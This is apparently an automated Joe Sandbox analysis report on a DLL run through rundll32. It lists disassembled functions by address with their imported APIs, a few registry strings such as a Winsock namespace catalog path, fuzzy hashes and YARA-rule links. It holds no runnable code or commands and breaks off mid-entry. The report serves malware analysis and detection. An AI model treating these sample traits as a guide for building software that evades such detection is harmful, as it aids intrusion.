Instruction ID: d8b3f425e63f89447d39efc1bc345abebf5d3e6023fccb7d542c747c2b091fce
Opcode Fuzzy Hash: 8336a6a89fcabd28b5c12f94c81a1b388f74c639fd6d2d3507a86c15d1e42b2a
Instruction Fuzzy Hash: A2F0B731B0164895EA928B54AC493943360B7497B5F909715E87A563F2DF28C79AD700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018AE8 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 000000018004388C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043AB7

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018C88
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018CA9

Part of subcall function 0000000180044250: EnterCriticalSection.KERNEL32 ref: 0000000180044280
Part of subcall function 0000000180044250: LeaveCriticalSection.KERNEL32 ref: 00000001800442BA

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018E36

Part of subcall function 0000000180042ADC: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042B9A

Part of subcall function 0000000180018AE8: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180018C64

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$??3@EnterLeave
String ID:
API String ID: 3906572401-0
Opcode ID: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
Instruction ID: 485792f3aa206c277c5c0904b00aba5ea33dd2ed139350c249341fca4c3fabed
Opcode Fuzzy Hash: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
Instruction Fuzzy Hash: 5CB15732B05B448AEB51CFA0A8407DD33F5F748798F144526EE9867B88DF34C65AD354

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070F00 Relevance: 7.7, APIs: 5, Instructions: 174COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180070F36

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
Instruction ID: 273587a47ae5326c80e6ba55da8392b357747b6508265d18e5e13f97f53468fd
Opcode Fuzzy Hash: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
Instruction Fuzzy Hash: 7471A572204B88CAE7AA8F19A4403EE77A4FB887D4F148115FE9947BD4DF3AC604C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180071699 Relevance: 7.7, APIs: 5, Instructions: 169COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00000001800716D5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 33c14279b65a0a1065906a216a7cb17b1be46cdf5c4d3f3d956cece1314462fd
Instruction ID: ec8d4e06a79a2d9622380bb27216e65fc7f67728013ab703cf37ba45c655d98d
Opcode Fuzzy Hash: 33c14279b65a0a1065906a216a7cb17b1be46cdf5c4d3f3d956cece1314462fd
Instruction Fuzzy Hash: CD71B6326047C88AF7B69F69A8403DE77A4F749799F108114EF850BBD9CF798A598B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016CA8 Relevance: 7.6, APIs: 5, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016D26
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016D4B
memmove.MSVCRT(?,?,?,0000000180016E29), ref: 0000000180016D69
??3@YAXPEAX@Z.MSVCRT ref: 0000000180016DA1
memmove.MSVCRT(?,?,?,?,?,?,?,0000000180016E29), ref: 0000000180016E10

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@memmove$??3@
String ID:
API String ID: 232491532-0
Opcode ID: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
Instruction ID: 28467c757ab6f7ef32b6ddf95ff48fc265dfbbceda238bfa6dff49904db51385
Opcode Fuzzy Hash: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
Instruction Fuzzy Hash: 0C41C432B05B8881EF568B16F9403996361E748BE0F548725AB7A07BE9DF78C6958340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A658 Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

_swprintf_c_l.LIBCMT ref: 000000018006A6B0
memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A6DB
memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A755

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$_swprintf_c_l
String ID:
API String ID: 3930809162-0
Opcode ID: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
Instruction ID: 2e3324a3b5d682f35c297bfefc02d538748b26edc97be9d81ac6111acbd6bae8
Opcode Fuzzy Hash: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
Instruction Fuzzy Hash: 0A41E33231875496EBA5DA26D90079A67A2BB4DBC0F248015AF1A43F41DE35D6688B40

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004D270 Relevance: 7.6, APIs: 5, Instructions: 112COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018004D300
??2@YAPEAX_K@Z.MSVCRT ref: 000000018004D325
memmove.MSVCRT ref: 000000018004D35B
memmove.MSVCRT ref: 000000018004D36E
??3@YAXPEAX@Z.MSVCRT ref: 000000018004D3A4

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@memmove$??3@
String ID:
API String ID: 232491532-0
Opcode ID: f6402eb9a1989caf2431d562a0b30ecbd21dbfbc94af5b8af8862a8d52686119
Instruction ID: 132db3e4afaf743dc264ff4a4633b1d62662e7f67770b965c8017c77268975f6
Opcode Fuzzy Hash: f6402eb9a1989caf2431d562a0b30ecbd21dbfbc94af5b8af8862a8d52686119
Instruction Fuzzy Hash: 0441B332310B8C81EA65CF69E5843ADA360F749BE4F658716ABBD03BD4CE38D249C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044CE4 Relevance: 7.6, APIs: 6, Instructions: 110COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044D24
LeaveCriticalSection.KERNEL32 ref: 0000000180044D3A
LeaveCriticalSection.KERNEL32 ref: 0000000180044D71
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044DDC
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044DF2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044E29

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
Instruction ID: 73bd4c9cd9396375e0c1b942217bf14bfc10cb3082dae23d56ea31479293823c
Opcode Fuzzy Hash: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
Instruction Fuzzy Hash: 19413932641B0896FA869F21EC943E83764F749FD9F598115EAA50B3A5CF28C74EC304

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016090 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018001611F
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016144
memmove.MSVCRT(?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 000000018001616B
??3@YAXPEAX@Z.MSVCRT ref: 00000001800161A1
memmove.MSVCRT(?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800161AB

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@memmove$??3@
String ID:
API String ID: 232491532-0
Opcode ID: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
Instruction ID: 3308181ea52ff5a0dd97f5d36b69886329373971ad435e2f25c4df82c4de258d
Opcode Fuzzy Hash: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
Instruction Fuzzy Hash: 8231D332705B8894EF5ACF16D9443986362F709FE0F588615EE6E07BE6DE78D299C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800161EC Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 0000000180016298
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162A6
??3@YAXPEAX@Z.MSVCRT ref: 00000001800162DE
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162E8
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162F6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$??3@
String ID:
API String ID: 2321372689-0
Opcode ID: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
Instruction ID: b2b38ff55e60cbfe57fc328909b4bad170525be2db7207aa5bf6da73de3f6202
Opcode Fuzzy Hash: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
Instruction Fuzzy Hash: 7831D272700A8891DB569F12E9043DE6351F748FD0F948522EF5E4BBA6DE3CC259C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800442DC Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180044380
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 000000018004439C
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443B5
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443CB
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443D9

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$??3@
String ID:
API String ID: 2321372689-0
Opcode ID: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
Instruction ID: 762f5997fa826d969e67cf094c143b4ceaf1448be14793aa958531d929a095e6
Opcode Fuzzy Hash: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
Instruction Fuzzy Hash: 8231A172300E9885D94AEE5286843DCA765F74DFD4F66C521BF680BB96CE38D24AC304

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180057FF0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

WindowFromPoint.USER32 ref: 000000018005802B
GetAncestor.USER32 ref: 0000000180058051
GetWindowRect.USER32 ref: 0000000180058071
memset.MSVCRT ref: 00000001800580D5
StrCmpIW.SHLWAPI ref: 00000001800580F6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Window$AncestorFromPointRectmemset
String ID:
API String ID: 3039914759-0
Opcode ID: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
Instruction ID: 06be680ac09e87041cb82e4d3d0d5ca659cc845397dc933fd24aa54eca265516
Opcode Fuzzy Hash: fc34e6d246657f66188d6f8573fbe65fb936fbcf3c4029c0371e48d01d16a740
Instruction Fuzzy Hash: 1931CD32615A4486F7E28F25DC487DA63A4FB8C7C4F449020FE5977694EF39CA99D700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004B34 Relevance: 7.6, APIs: 5, Instructions: 82COMMON

Download Yara Rule

APIs

iswspace.MSVCRT ref: 0000000180004B51
iswspace.MSVCRT ref: 0000000180004B62
_errno.MSVCRT ref: 0000000180004BC5
memmove.MSVCRT ref: 0000000180004BE4
_errno.MSVCRT ref: 0000000180004C25

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errnoiswspace$memmove
String ID:
API String ID: 972559988-0
Opcode ID: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
Instruction ID: aea15859d9ef88290176a7c9cabebc096ef147a52e12ca1286494642d1a9418c
Opcode Fuzzy Hash: 62484f1315cc315bf352517e41dc366093ff24740a399b805c186dd2600ce3b7
Instruction Fuzzy Hash: 3531CBB3601A4886EB99DF54D9847ED33A0F788BC0F18C019EB4A0B792DF3DDA588744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010EFC Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180011890: EnterCriticalSection.KERNEL32 ref: 00000001800118C7
Part of subcall function 0000000180011890: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180011949
Part of subcall function 0000000180011890: LeaveCriticalSection.KERNEL32 ref: 0000000180011965

DeleteCriticalSection.KERNEL32(?,?,?,?,?,0000000180006D7E), ref: 0000000180010F28

Part of subcall function 00000001800101E0: ??3@YAXPEAX@Z.MSVCRT ref: 000000018001021F

??3@YAXPEAX@Z.MSVCRT ref: 0000000180010F67
??3@YAXPEAX@Z.MSVCRT ref: 0000000180010FCC
??3@YAXPEAX@Z.MSVCRT ref: 0000000180010FE2
DeleteCriticalSection.KERNEL32(?,?,?,?,?,0000000180006D7E), ref: 0000000180011004

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??3@$CriticalSection$Delete$EnterLeave
String ID:
API String ID: 274858031-0
Opcode ID: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
Instruction ID: d11087617417198f0cbd7eb66d5c9be171642f9dfb033e604718f16c8d919299
Opcode Fuzzy Hash: a29c501b7cb5b62190f2ee82e18e93e4c2b49ef20e282c724fca1469eff036db
Instruction Fuzzy Hash: 49312A36201E88A2EB569F64E4913DDA360F7897D0F54C522EB9D437A1DF78DAA9C300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072640 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072658

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
Instruction ID: a73d7fb5a67d4d67bba371cf0b3796608c1c1b370b7326418a0f08ed132aa8b6
Opcode Fuzzy Hash: ef9a1a2487f9f747f790f9b6156918c71975c41e3d5b8d109555e51fa42619a5
Instruction Fuzzy Hash: D411E03270468881EAE66B25B1403DE63D0E7487E0F09A226FBAA1B7C5CE3DD5D79714

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180072700 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180072718

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
Instruction ID: ac3a4cfa431d0ef0eaea2260b684207aebe75cd91c02b4061f0f196fb58aac9a
Opcode Fuzzy Hash: c89821886ccf670e100f3b8fb91d8e831a6b96267fb5c2ba29df3964e1113532
Instruction Fuzzy Hash: 2611013270878881EAEA6B25B2403DE6391E7487D0F08A125BBAA0B3C5DE3DD5979304

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021380 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 416COMMON

Download Yara Rule

APIs

Part of subcall function 000000018002845C: GetModuleHandleW.KERNEL32 ref: 0000000180027F2B
Part of subcall function 000000018002845C: GetProcAddress.KERNEL32 ref: 0000000180027F44
Part of subcall function 000000018002845C: GetCurrentProcess.KERNEL32 ref: 0000000180027F52

wcschr.MSVCRT ref: 00000001800217F2
_wtoi.MSVCRT ref: 0000000180021804

Strings

SOFTWARE\Clients\, xrefs: 00000001800213F9
DefaultIcon, xrefs: 0000000180021764

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess_wtoiwcschr
String ID: DefaultIcon$SOFTWARE\Clients\
API String ID: 833562760-2446904873
Opcode ID: 414823221a86c1837642ff439834e8e89b0462007a4a3547001d189a16df377c
Instruction ID: 620cb3c04c623a8aa70c050194555e8f9deebbfdc28fef94ac7d519f34bee134
Opcode Fuzzy Hash: 414823221a86c1837642ff439834e8e89b0462007a4a3547001d189a16df377c
Instruction Fuzzy Hash: BC0272B2601A4886EB429B29C8407DD73A1FB85BF5F449312FA3D436E5DF78CA89C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800543E4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 211COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 00000001800544D5
??2@YAPEAX_K@Z.MSVCRT ref: 00000001800544FA
??3@YAXPEAX@Z.MSVCRT ref: 000000018005469A

Strings

%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 00000001800543EC

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: %s\NameSpace_Catalog5\Catalog_Entries\%012d
API String ID: 1245774677-2131870787
Opcode ID: af5baddc67ad33526a33c39d65950fd72fb0df208da0cc0d422425bada8017cf
Instruction ID: 67395956b14f0255dc157d00751ecdd5e79b91100998fde5bc7e771f553c8d3c
